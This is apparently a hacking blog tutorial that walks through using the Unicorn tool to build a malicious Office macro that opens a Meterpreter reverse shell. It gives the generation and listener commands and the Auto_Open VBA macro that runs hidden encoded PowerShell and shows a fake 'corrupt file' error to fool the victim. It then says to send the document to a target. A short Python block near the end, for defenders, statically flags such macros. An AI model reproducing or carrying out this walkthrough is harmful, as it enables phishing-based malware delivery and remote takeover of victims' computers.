Hey Guys wazzup.
Today is the first part of my Microsoft Meterpreter Macros series.
The first tool to pwn Microsoft Office is Unicorn.
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
To run this tool you need python2 on your system. (Don't install it with apt-get install unicorn; that is an entirely different tool!)
Instead, clone it from GitHub:
git clone https://github.com/trustedsec/unicorn.git
Move into the directory with:
cd unicorn
Run it with the command:
python unicorn.py
or:
chmod +x unicorn.py; ./unicorn.py
You will see this:
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro
HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Help Menu: python unicorn.py --help
and a quite cool ASCII picture of a unicorn :)
To actually generate the macro, type:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.x.x 443 macro
After that you will see this:
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[************************************************************]
-----MACRO ATTACK INSTRUCTIONS----
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do
that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code
into that. This will automatically run. Note that a message will prompt to the user saying that the file
is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the
victim to thinking the excel document is corrupted. You should get a shell through powershell injection
after that.
NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO
REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL
HAPPEN!
[*****************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener
Okay, great. First of all, open up a new terminal and start a listener by typing:
msfconsole -r unicorn.rc
(the same as: msfconsole, use multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST 192.168.x.x, set LPORT 443, exploit -j)
Then switch back to your unicorn window and type: cat powershell_attack.txt
(This will print out the actual macro code we're going to use.)
The output is something like this:
Sub Auto_Open()
Dim x
x = "powershell -window hidden -enc [base64-encoded PowerShell payload omitted]"
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Yes it's really long I know :)
After that, switch to a Windows box and open Microsoft Word or Microsoft Excel. Go to the 'View' tab, select the Macros button and then View Macros.
Add a new macro (just give it the name you want) and press Create.
(You can do all these steps in one: just hit Alt+F11.)
Remove the code the editor creates by default and paste the generated macro code into the editor. Just close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled Document) or WhateverYouWant.doc (must be a Word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your Metasploit listener on.
Bam you got a session and your target box is pwned just by opening a Document!
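For defenders, the macro shape shown earlier (an Auto_Open sub that builds a "powershell -window hidden -enc" string across "_" continuation lines and hands it to Shell) can be triaged statically from extracted macro source. The following is an added example, not part of the original post or of Unicorn; the function names, marker list and scoring are assumptions, and the sample macro is constructed with an inert text payload.

```python
import base64
import re

# Heuristic markers picked for this example (an assumption, not a vendor rule set).
API_MARKERS = ("DllImport", "VirtualAlloc", "CreateThread")
AUTOEXEC = re.compile(r"^\s*Sub\s+(Auto_?Open|Document_Open|Workbook_Open)\b", re.I | re.M)
ENC_ARG = re.compile(r"-(?:e|en|enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:in|indow|indowstyle)?\s+hidden", re.I)


def join_vba_string(vba_source, var="x"):
    """Rebuild a string assigned as  x = "..." _ / & "..."  over continuation lines."""
    # Fold VBA line continuations (space + underscore at end of line) into one line.
    folded = re.sub(r"[ \t]+_[ \t]*\r?\n", " ", vba_source)
    for line in folded.splitlines():
        m = re.match(rf"\s*{re.escape(var)}\s*=\s*(.+)$", line)
        if m:
            # Concatenate every quoted literal on the right-hand side.
            return "".join(re.findall(r'"([^"]*)"', m.group(1)))
    return ""


def decode_encoded_command(cmdline):
    """Return the script carried by -enc (base64 of UTF-16LE text), or ''."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # malformed base64: nothing to report
        return ""


def triage_macro(vba_source):
    """Score a macro for the auto-run + hidden, encoded PowerShell pattern."""
    cmd = join_vba_string(vba_source)
    script = decode_encoded_command(cmd)
    findings = {
        "autoexec": bool(AUTOEXEC.search(vba_source)),
        "shell_call": bool(re.search(r"\bShell\s*\(", vba_source, re.I)),
        "hidden_window": bool(HIDDEN.search(cmd)),
        "encoded_command": bool(script),
        "api_markers": [a for a in API_MARKERS if a.lower() in script.lower()],
    }
    flags = ("autoexec", "shell_call", "hidden_window", "encoded_command")
    # One point per behavioural flag, two more if Win32 injection APIs are named.
    findings["score"] = sum(findings[k] for k in flags) + (2 if findings["api_markers"] else 0)
    return findings


def constructed_sample():
    """Constructed macro with an inert payload: API names as plain text only."""
    script = '[DllImport("kernel32.dll")] VirtualAlloc CreateThread'
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    half = len(b64) // 2
    return (
        "Sub Auto_Open()\n"
        "Dim x\n"
        f'x = "powershell -window hidden -enc {b64[:half]}" _\n'
        f'& "{b64[half:]}"\n'
        'Shell ("POWERSHELL.EXE " & x)\n'
        "End Sub\n"
    )


if __name__ == "__main__":
    print(triage_macro(constructed_sample()))
```

The same decode step applies to process-creation logs: an Office application spawning powershell.exe with a hidden window and an encoded command is the runtime counterpart of what this static check flags.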
That was it for today, guys.
Happy Hunting :)
@ClaimItToYou
PS: if you want to follow me, David Kennedy (ReL1k) or TrustedSec on Twitter, here are the links:
* https://twitter.com/hackingdave
* https://twitter.com/trustedsec
* https://twitter.com/ClaimItToYou